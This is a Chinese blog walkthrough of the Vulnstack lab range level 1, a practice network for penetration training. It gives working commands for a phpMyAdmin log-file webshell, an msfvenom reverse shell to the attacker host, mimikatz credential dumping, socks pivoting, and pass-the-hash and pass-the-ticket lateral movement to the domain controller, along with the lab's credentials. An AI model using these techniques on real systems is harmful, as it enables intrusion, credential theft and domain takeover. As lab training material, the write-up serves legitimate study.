红日靶机vulnstack第一关

已于 2022-06-18 18:49:52 修改
阅读量588 收藏
点赞数
文章标签: 安全 web安全 系统安全
于 2022-05-22 18:32:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45715461/article/details/124914371
版权

一、环境搭建

  1. 添加一个VMnet2的配置(192.168.53.0/24)。

img

img

img

  1. 最终利用到的网卡配置信息。

image-20220519105441122

  1. 详细的ip配置。
主机名等级网卡地址
windows2008域控(host-only)192.168.52.138(VMnet2)
windiws7web服务器W(双网卡host-only)192.168.52.143(VMnet2)/192.168.31.128(VMnet1)
windows2003内网普通机器(host-only) 192.168.52.141(VMnet2)
kali攻击机(host-only)192.168.31.129(VMnet1)

二、拿下web服务器

信息收集

  1. 使用nmap扫描192.168.31.0/24,发现192.168.31.128的ip开放了80和3306端口。这里的192.168.31.1是本机的地址,而192.168.31.129是攻击机的地址,不考虑进行利用。
nmap 192.168.31.0/24

img

  1. 登录80端口之后发现是phpStudy的探针网页。

img

  1. 使用dirserch工具扫描192.168.31.128:80,发现存在关键文件phpinfo.php和phpmyadmin。
./dirsearch.py -u "192.168.31.128:80" -w ../top3000.txt

img

通过phpmyadmin拿下webshell

  1. 登录phpmyadmin尝试使用弱口令进行登录,发现root/root成功登录。

img

  1. 查看secure_file_priv的值是否为"“,如果是”“而,不是"NULL”,就说明我们可以通过使用file_into写入webshell。但是这里发现值为NULL说明无法使用file_into写入webshell。

    show global variables like "%secure%"

img

  1. 尝试使用全局日志getshell,首先要先查看下全局变量general,发现是关闭的,所以需要我们进行开启全局日志。
show global variables like "%general%"

img

  1. 开启全局日志并且将log日志文件存放于C:/phpStudy/WWW/hack.php,这里的网站路径位置是从php探针中得到的。

img

set global general_log=ON;
set global general_log_file='C:\phpStudy\WWW\hack.php';

img

  1. 写码
select '<?php eval($_POST[hack]);?>'

img

  1. 使用蚁剑进行连接,发现连接成功,说明拿到了Webshell。

img

三、内网渗透

信息收集

通过CS进行内网信息收集

  1. 开启团队服务器,可以是本机的ip地址。(忽略https://tc1-1305485727.cos.ap-guangzhou.myqcloud.com/%E7%BA%A2%E6%97%A51/的说明)
./teamserver 192.168.31.128(服务器地址,可以是本机的ip地址) 123456(服务器的连接密码)

img

  1. 创建客户机,是自己的ip地址。(忽略https://tc1-1305485727.cos.ap-guangzhou.myqcloud.com/%E7%BA%A2%E6%97%A51/的说明)
./cobaltstrike
HOST:192.168.31.129(是自己的ip地址,如果是在服务器上使用的话就是服务器的ip地址)
Password:服务器连接密码

img

  1. 客户端创建监听器。

img

  1. 设置要监听的ip地址。

img

  1. 生成木马

img

  1. 选择木马的监听器

img

  1. 木马的存放位置

img

  1. 将木马上使用蚁剑传到网站中。

img

  1. 使用蚁剑进行运行该后门。

img

  1. 发现成功上线

img

  1. 右击选择会话交互(interact)即可进行交互。

img

  1. 输入sleep 0,可以很快速就出指令执行的结果,如果在实战中不可以设置太短,这里由于是自己搭建的,所以无所谓。

img

  1. 在上线的机器右击,选择浏览探测下的网络探测,发现存在三台机器,并且OWA是PDC,即是域控。

img

  1. 进行权限提升,提权成功。

img

  1. 查看系统的信息。

img

  1. 扫描端口,还发现了域名是GOD。

image-20220519125152382

  1. 查看NTLM值。

image-20220519130358857

  1. 抓取明文密码

img

  1. 点击视图里面的密码凭证可以清晰的查看到明文密码。

image-20220519123002471

  1. 整理收集到的内网信息。
NTLM用户明文密码
8c535a2d84c3b21059d667639bb89db5Administratorhongrisec@2022GOD
名字IP地址端口
OWA(域控)192.168.52.13853、80、88、135、139、389、445、464、593、636
ROOT-TVI862UBEH192.168.52.14121、135、139、445、777
STU1192.168.52.14380、135、139、445
  1. 根据上一步所获取到的存活主机、端口、hash值、明文密码、域名、系统信息之后,我们就完成了内网信息收集的工作,接下来就是要进行横向移动了。

首先使用梼杌插件开启3389远程端口,并且进行登录(GOD\Administrator,hongrisec@2022)

image-20220519145211549

发现连接成功了。

image-20220519145116865

通过MSF6进行内网信息收集

  1. 首先生成linux反向代理木马,通过蚁剑上传到目标中,并且运行他。
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.129 LPORT=2022 -f exe > run2.exe

image-20220521222642144

发现反弹shell成功。

image-20220521222932242

  1. 为了会话的稳定性,需要把meterpreter shell迁移到其他不容易被关闭的进程上,通常是explorer.exe(文件资源管理器),因此我们需要先查看下进程信息。
shell
tasklist | findstr explorer.exe

image-20220521224825892

退出shell,迁移进程

migrate 2488(explorer.exe进程号)

image-20220521225157960

  1. 开启3389端口。
use post/windows/manage/enable_rdp
set session 1
run

image-20220521235418748

  1. 基本信息收集
基本信息收集:
systeminfo 详细信息(操作系统版本、补丁编号等信息)
net start 启动服务(查看当前主机开启了哪些服务,从服务中就可以判断它是什么角色)
tasklist 进程列表(查看当前主机开启了哪些进程)
schtasks 计划任务(若报错无法加载列资源,说明你的权限不够,因此要提权才能使用该命令)

网络信息收集:
ipconfig /all 判断存在域-最简单方式查看主DNS后缀
net view /domain 判断存在域
net time /domain 判断主域(主域就是域控的意思)【在域环境下查看当前时间】
nslookup <域控制器全名> 追踪来源地址
netstat -ano 当前网络端口开放
arp -a 查看arp信息,可以找到存活主机

用户信息收集操作:
whoami /all 用户权限
net config workstation 登录信息
net user 当前电脑里面的用户(本地用户)
net localgroup 本地用户组
net user /domain 当前域里面的用户
net group /domain 获取域用户组信息
wmic useraccount get /all 涉及域用户详细信息
net group "Domain Admins" /domain 查询域管理员账户
net group "Enterprise Admins" /domain 查询管理员用户组
net group "Domain Controllers" /domain 查询域控制器

这里就简单演示下一些信息的收集。

net view /domain	#判断存在域,GOD、WORKGROUP域
net time /domain	#判断存在主域,owa.god.org
wmic useraccount get /all	#涉及域用户详细信息

image-20220521231151726

image-20220522092040196

net group "Domain Controllers" /domain 查询域控制器
net group "Enterprise Admins" /domain 查询管理员用户组
net group "Domain Admins" /domain 查询域管理员账户
net user	#当前电脑里面的用户(本地用户)

image-20220521231946734

ipconfig 查看网卡信息

image-20220521232212572

探测存活主机

for /L %I in (1,1,254) do @ping -w 1 -n 1 192.168.52.%I | findstr "TTL ="	#缺点,太慢了;优点是系统命令,不会被杀
其他:nmap,masscan,第三方Powershell脚本nishang、empire等(个人喜欢NiShang)
还可以使用arp -a进行存活主机的发现

image-20220521233602110

image-20220522084938648

ping域控,得到域控的ip地址

ping owa.god.org

image-20220522113944405

  1. 获取凭证

使用mimikatz

load kiwi(kali版mimikatz)

image-20220521234517623

查看kiwi的命令

help kiwi

image-20220521234546657

想要读取LM/NTLM时,发现提示权限不够,查看现在的权限是管理员权限,不是系统权限。

image-20220521234745189

使用getsystem提取,发现提权成功,然后再获取LM/NTLM的值,发现还暴露了明文密码,可以直接通过远程桌面进行登录。

creds_all

image-20220521235733012

查看路由和添加路由

run get_local_subnets
run autoroute -s 192.168.52.128/24(目标环境)
run autoroute -p
添加完路由之后可以进行socks代理

image-20220522081200331

image-20220522081447101

进行socks代理,注意,proxychains只对tcp流量有效,所以udp和icmp都是不能代理转发的。

use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
run

vi /etc/proxychains.conf
#socks 127.0.0.1 9050
socks5 127.0.0.1 1080

image-20220522082204665

image-20220522082232037

进行扫描,查看端口开放信息

proxychains nmap -sT -Pn 192.168.52.143
proxychains nmap -sT -Pn 192.168.52.141

image-20220522084547464

对上面得到的信息进行整理

NTLM用户明文密码
8c535a2d84c3b21059d667639bb89db5Administratorhongrisec@2022GOD
名字IP地址端口
OWA(域控)192.168.52.13853、80、88、135、139、389、445、464、593、636
192.168.52.14121、135、139、445、777
STU1192.168.52.14380、135、139、445

横向移动

使用哈希传递(PTH)攻击

  1. 由于我们得到了明文,因此可以使用明文进行攻击,这里需要我们用到微软官方下载的软件包PSTools,这个只支持明文,不支持密文。
PsExec.exe \\192.168.52.138 -u god\administrator -p hongrisec@2022 -s cmd #成功,拿下域控了。
PsExec.exe \\192.168.52.141 -u god\administrator -p hongrisec@2022 -s cmd #失败

image-20220519151701444

image-20220519153720738

  1. 使用PTH进行哈希传递攻击,由于PSTools工具包支持明文,不支持密文,所以需要我们下载第三方包impacket。
psexec -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138 #成功,拿下域控了。
psexec -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.141 #成功

image-20220519153031154

image-20220519153453311

使用票据传递(PTT)攻击

  1. 生成票据
privilege::debug
sekurlsa::tickets /export

image-20220519162412967

  1. 删除票据。
kerberos::purge

image-20220519162814681

  1. 导入票据。
kerberos::ptt "票据的路径加上文件名"

image-20220519163145968

  1. 利用票据

image-20220519163830774

查看域控的C盘是否确实存在我是域控的文件夹,发现确实存在,此时拿下了域控说明本次内网攻击完成。

image-20220519163926489

俺不想学习
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ATK&CK1红队评估实战靶场Vulnstack之第一篇环境介绍和搭建
千寻的博客
07-21 906
文章目录靶机介绍靶机下载地址靶机背景靶机实战思路一、环境搭建二、漏洞利用三、内网搜集四、横向移动五、构建通道六、持久控制七、痕迹清理靶机环境拓扑环境搭建靶机环境地址WEB服务器:windows7系统域成员:windows server 2003系统![在这里插入图片描述](https://img-blog.csdnimg.cn/img_convert/fa957b0ccc538bf989301bbf270eda7c.png)域控服务器:windows server 2008系统攻击机器:kali 2021环
vulnstack红日-三
paidx0
07-06 370
vulnstack红日-三
vulnstack1 渗透分析 红日靶场(一)
最新发布
黑战士的博客
03-22 1177
当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在mysqld内加入secure_file_priv =“”。当value为“null”时,不允许读取任意文件,当value为“空”时,允许读取任意文件,value可也已设置为其他路径。访问80端口是一个phpStudy 探针,结合phpinfo.php和探针知晓主目录在C:/phpStudy/WWW。选择psexec横向移动。
红日安全ATT&CK靶机实战系列之vulnstack1
黑白的博客
04-13 6694
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 边下载着,可以开始vmware的网络配置 下图为官方给出的,从虚拟机网络来看 攻击者:kali+windows的攻击机 VM1:对外边界服务器,win7 VM2:域成员,2003 VM3:域控,2008 所以这中间出现两个网段,一个外网网段,一个内网网段 鉴于需要两个网段,我们需要在vmware上做一些配置 首先,用一
vulnstack1--红队靶机
qq_46527080的博客
01-15 3580
文章目录一、环境搭建一、前渗透的阶段首先信息收集getshell尝试内网信息收集二、后渗透阶段(一)msf和cs联动内网信息收集三、攻击域(内网渗透)(一)提权(二)横向移动攻击域控 一、环境搭建 搭建靶机环境是(要求这几个内网互ping要通) 一台链接外网的域成员网站机 win 7+phpstudy 一台域控主服务器 win server 08 一台域控成员 server 03 win 7 有两个网卡(win7中的phpstudy也得开启) 一个仅主机(必须和其他两个域控都选择第一个网卡为仅主.
vulnstack(一)
qq_63928796的博客
03-17 723
三台机器在同一内网中,win7 web服务开放在外网,只能通过拿下win7后将其作为跳板进行横向渗透,拿下win2008和win2003服务器。就可以了。
OWASP靶机安全学习、测试
05-24
OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
安装部署Web安全测试用的靶机
11-24
个人作业,希望有所帮助
hack me please靶机攻略.docx
10-19
本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:nmap -p- -sS -O -sV -sC -A -...
Vulnstack1学习
ruyueattention
10-26 1113
文章目录前言一、环境搭建二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、环境搭建 一共三台机器,其中w7属于外网入口,w2003与windows server2008属于内网主机。因此为了实现环境需要为w7设置两张网卡,一张内网,一张外网。 w7 w2003 windows server
vulnstack内网渗透环境靶场-1 大全
鸣蜩十四的博客
08-19 2925
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 这次靶场一共三个环境,win7,win2003,win2008,win7是web服务器,上面我们需要两张网卡,一张nat模式,一张主机模式,win2003是域成员,win2008为域控 Win7配置如下: 在win7中使用phpstudy开
靶场vulnstack4的搭建
weixin_71169068的博客
11-17 647
搭建靶场vulnstack4
内网渗透之vulnstack靶场系列(一)
xf555er的博客
10-18 1986
Vulnstack靶场有两个默认用户, 分别是域成员和域管理员用户, 其默认密码均为首次登录会要求用户修改密码, 除此之外我还新添加了个用户用于登录win2003主机所有的用户信息如下表格所示:下图为网卡的配置信息, 配置的子网IP为, 设置为仅主机模式下图为NAT模式的网卡配置信息, 配置的子网IP为域控的网络连接配置如下:Web服务器有两个网卡, 其中一个网卡是用于Web服务器与域内主机进行数据交互, 此网卡需将DNS服务器地址设置成域控服务器地址, 其他域内成员的网络配置亦是如此, 这里就不详细描述了
红日靶场vulnstack1(上)
errorr0
04-14 1827
红日1的网络配置
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 786
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
红日靶场】vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1163
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
【内网安全】——CS操作指南(一)
Demo不是emo的博客
02-03 8563
cs基础教程(一),cs的安装和启动
怎么做一个windows服务器系统靶机
05-14
要制作一个Windows服务器系统的靶机,你可以按照以下步骤进行: 1. 下载Windows Server操作系统ISO文件,可以从官方网站或其他可靠来源下载。 2. 安装虚拟机软件,例如VMware Workstation或VirtualBox。 3. 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值